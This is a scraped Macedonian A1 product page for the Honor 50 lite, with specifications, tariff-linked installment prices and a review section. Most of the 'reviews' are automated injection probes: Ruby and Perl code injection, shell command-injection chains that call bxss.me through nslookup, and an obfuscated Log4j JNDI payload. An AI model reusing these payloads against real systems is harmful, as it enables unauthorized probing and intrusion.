Мобилна

Honor 50 lite

Не пропуштајте да ниту еден детаљ на супер големиот дисплеј на Honor 50 lite, кој во себе содржи технологија на автоматско приспособување на соодветни бои и светлина што овозможуваат удобно и реално доживување на сликата која ја гледате. Воедно, чувствувајте се сигурно и опуштено, додека го користете го паметниот телефон до максимум, бидејќи истиот доаѓа со можност за супербрзо полнење, што во одредени услови овозможува батеријата се полни и до 40% за период од 10 минути.

Прочитај повеќе
6GB / 128GB
64+8+2+2MP rear + 16MP front
4300 mAh
6.67" TFT LCD Display
Octa-core
онлајн попуст 4.000 ден.
Ограничени количини
достапен
онлајн недостапен
боја: Midnight Black

Достапно во ограничени количини

достапен

онлајн недостапен

Тарифа
A1 Nova M
Промени тарифа
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.
Цена

379 ден. x 24 рати

209 ден. x 24 рати

Бесплатна достава

Сакате да знаете кога ќе има залиха?

Ограничени количини
достапен
онлајн недостапен

A1 Nova XS

499 ден./мес.

 
 
4GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
 
 
  

Цена за Honor 50 lite

459 ден. x 24 рати
Одбери

A1 Nova S

899 ден./мес.

 
60GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor 50 lite

334 ден. x 24 рати
Одбери

A1 Nova M

1.099 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor 50 lite

209 ден. x 24 рати
Одбрано

A1 Nova L

1.299 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor 50 lite

129 ден. x 24 рати
Одбери
Одберете тарифа
Враќање на производ
Бесплатна достава
Секогаш во добивка
Безбедно плаќање

Љубов на прв поглед

Сега екранот е поголем благодарение на тенката граница од само 1.05mm. Големиот 6.67" HONOR FullView екран, ги менува боите и осветленоста благодарение на конверзијата заснована на температурни промени.

66W HONOR SuperCharge

Наполнете ја батеријата од Вашиот телефон до 40% за само 10 минути со помош на 66W опцијата “SuperCharging“. Повеќе од половина од капацитетот на батеријата можете да го наполните додека ги завршувате Вашите утрински обрвски.

Доловете ја убавината на фотографиите преку детали

Главната камера 1/1.7” 64MP резолуција, значително го подобрува контрастот и квалитетот на фотографијата при ноќни или денски фотографирања. Фотографирајте повеќе детали со 8MP широкоаголна камера или пак фотографирајте и објекти со близина до 4cm. со независната “макро“ камера.

Бидете секогаш онлајн, полни со енергија

Со батеријата која има капацитет од 4300mAh, ќе можете да бидете онлајн и до 16 часа, ќе можете да гледате видеа до 8 часа или пак да ја играте Вашата омилена видео игра до 7 часа.

6.67” TFT LCD Display
64+8+2+ 2MP rear + 16MP front
Octa-Core, Qualcomm Snapdragon 662
128GB internal / 6GB RAM

Honor 50 lite

Цена на уредот во тарифа
Тарифа
Времетраење на договор
Начин на плаќање
Со еднократен надомест за уред на рати од 199 ден.

A1 Nova XS

499 ден./мес.

 
 
4GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 
  
 
 
  
  
 
 
  

Цена за Honor 50 lite

459 ден. x 24 рати
Одбери

A1 Nova S

899 ден./мес.

 
60GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor 50 lite

334 ден. x 24 рати
Одбери

A1 Nova M

1.099 ден./мес.

Препорачана тарифа
5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor 50 lite

209 ден. x 24 рати
Одбрано

A1 Nova L

1.299 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
 
 
  
  
 
 
  
  

Цена за Honor 50 lite

129 ден. x 24 рати
Одбери

A1 Nova XL

1.599 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
100 минути
 
меѓународни разговори 
  
 
 
  
  

Цена за Honor 50 lite

/

A1 Nova XS SIM

449 ден./мес.

 
 
4GB
 
национален интернет 
 
 
  
  
Неограничени
 
национални минути 

Цена за Honor 50 lite

/

A1 Nova S SIM

799 ден./мес.

 
60GB
 
национален интернет 
A1 Net Sef
 
до 50GB 
  
Неограничени
 
национални минути и ЅМЅ 
  

Цена за Honor 50 lite

/

A1 Nova M SIM

999 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  

Цена за Honor 50 lite

/

A1 Nova L SIM

1.099 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  

Цена за Honor 50 lite

/

A1 Nova XL SIM

1.399 ден./мес.

5G
 
неограничен
 
национален интернет 
A1 Net Sef
 
до 100GB 
со опција за размена 
Неограничени
 
национални минути и ЅМЅ 
  
100 минути
 
меѓународни разговори 
  

Цена за Honor 50 lite

/

A1 Senior

299 ден./мес.

 
 
500MB
 
национален интернет 
Неограничено
 
минути кон A1 
  
50
 
Минути кон останати нац. 
мрежи (фиксни/мобилни) 
50
 
SМЅ кон сите 
национални мрежи 

Цена за Honor 50 lite

/
Основна цена
16.999денари
Припејд
18.999денари
Цена само за уред
18.999денари

Одбери

Honor 50 lite

Што има во кутијата?
  • Honor 50 lite
  • Адаптер за полнење
  • Кабел за полнење
  • Упатство за употреба
  • Гарантен лист
Основни карактеристики
  • 6GB / 128GB
  • 64+8+2+2MP rear + 16MP front
  • 4300 mAh
  • 6.67" TFT LCD Display
  • Octa-core
8.5 mm
74.7 mm
161.8 mm
Детални карактеристики
Мрежа GSM/HSPA/LTE
Тип на SIM Dual Nano SIM
Екран TFT LCD Display (1080 x 2376)
Големина на екранот 6.67"
Камера 64MP + 8MP + 2MP + 2MP
Оперативен систем Android
CPU Octa-core Qualcomm SDM662
Вградена меморија 128 GB
RAM меморија 6 GB
Батерија Li-Ion 4300 mAh
Македонско мени Yes
Телефонот работи само со А1 SIM картичка No
Предна камера 16MP
Димензии 161.8 x 74.7 x 8.5 mm
Тежина 192g
Гаранција 24
Гаранција и сервис
24
месецигаранција од производител
Овластен сервисер за овој уред

Доколку имате потреба од сервис за Вашиот Honor 50 lite, контактирајте го овластениот сервисер.

Honor 50 lite

Оценка од корисници

Има вкупно 25 рецензии за овој уред

14
6
5
0
0
4.4
'+'A'.concat(70-3).concat(22*4).concat(115).concat(84).concat(121).concat(73)+(require'socket' Socket.gethostbyname('hitfy'+'ahfmjqne9a76c.bxss.me.')[3].to_s)+'
17.01.2023

Дали Ви помогна оваа рецензија?
"+"A".concat(70-3).concat(22*4).concat(114).concat(88).concat(99).concat(73)+(require"socket" Socket.gethostbyname("hiths"+"azsegerwd2729.bxss.me.")[3].to_s)+"
21.01.2023

Дали Ви помогна оваа рецензија?
pHqghUme
19.01.2023

Дали Ви помогна оваа рецензија?
;(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohyozcgvlf94a4.bxss.me')")|(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohyozcgvlf94a4.bxss.me')")&(nslookup hitrohyozcgvlf94a4.bxss.me||perl -e "gethostbyname('hitrohy
21.01.2023

Дали Ви помогна оваа рецензија?
'.gethostbyname(lc('hitux'.'esqpkjobe33c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(79).chr(100).chr(86).'
17.01.2023

Дали Ви помогна оваа рецензија?
;(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyreofuowha00e2.bxss.me')")|(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyreofuowha00e2.bxss.me')")&(nslookup hitlyreofuowha00e2.bxss.me||perl -e "gethostbyname('hitlyre
17.01.2023

Дали Ви помогна оваа рецензија?
pHqghUme
21.01.2023

Дали Ви помогна оваа рецензија?
'.gethostbyname(lc('hitao'.'brprvlaf695cf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(86).chr(109).chr(84).'
21.01.2023

Дали Ви помогна оваа рецензија?
Darko Krstevski
03.03.2022

Odlicen telefon

Дали Ви помогна оваа рецензија?
echo oakynu$()\ kymhty\nz^xyu||a #' &echo oakynu$()\ kymhty\nz^xyu||a #|" &echo oakynu$()\ kymhty\nz^xyu||a #
17.01.2023

Дали Ви помогна оваа рецензија?
07.03.2022

Дали Ви помогна оваа рецензија?
23.08.2022

Дали Ви помогна оваа рецензија?
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-5639..9c566${::-.}1${::-.}bxss.me}}
17.01.2023

Дали Ви помогна оваа рецензија?
|(nslookup hitsolojogsxk85071.bxss.me||perl -e "gethostbyname('hitsolojogsxk85071.bxss.me')")
19.01.2023

Дали Ви помогна оваа рецензија?
pHqghUme
21.01.2023

Дали Ви помогна оваа рецензија?
abc123
23.04.2023

Дали Ви помогна оваа рецензија?
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
21.01.2023

Дали Ви помогна оваа рецензија?
".gethostbyname(lc("hittt"."rrmvlcff2f981.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(88).chr(118).chr(68)."
21.01.2023

Дали Ви помогна оваа рецензија?
03.03.2022

Дали Ви помогна оваа рецензија?
pHqghUme
19.01.2023

Дали Ви помогна оваа рецензија?
pHqghUme
21.01.2023

Дали Ви помогна оваа рецензија?
`(nslookup hitwomhwqmtqlb06bf.bxss.me||perl -e "gethostbyname('hitwomhwqmtqlb06bf.bxss.me')")`
19.01.2023

Дали Ви помогна оваа рецензија?
&(nslookup hitzkyktwhkspf4590.bxss.me||perl -e "gethostbyname('hitzkyktwhkspf4590.bxss.me')")&'\"`0&(nslookup hitzkyktwhkspf4590.bxss.me||perl -e "gethostbyname('hitzkyktwhkspf4590.bxss.me')")&`'
19.01.2023

Дали Ви помогна оваа рецензија?
pHqghUme
21.01.2023

Дали Ви помогна оваа рецензија?
pHqghUme
19.01.2023

Дали Ви помогна оваа рецензија?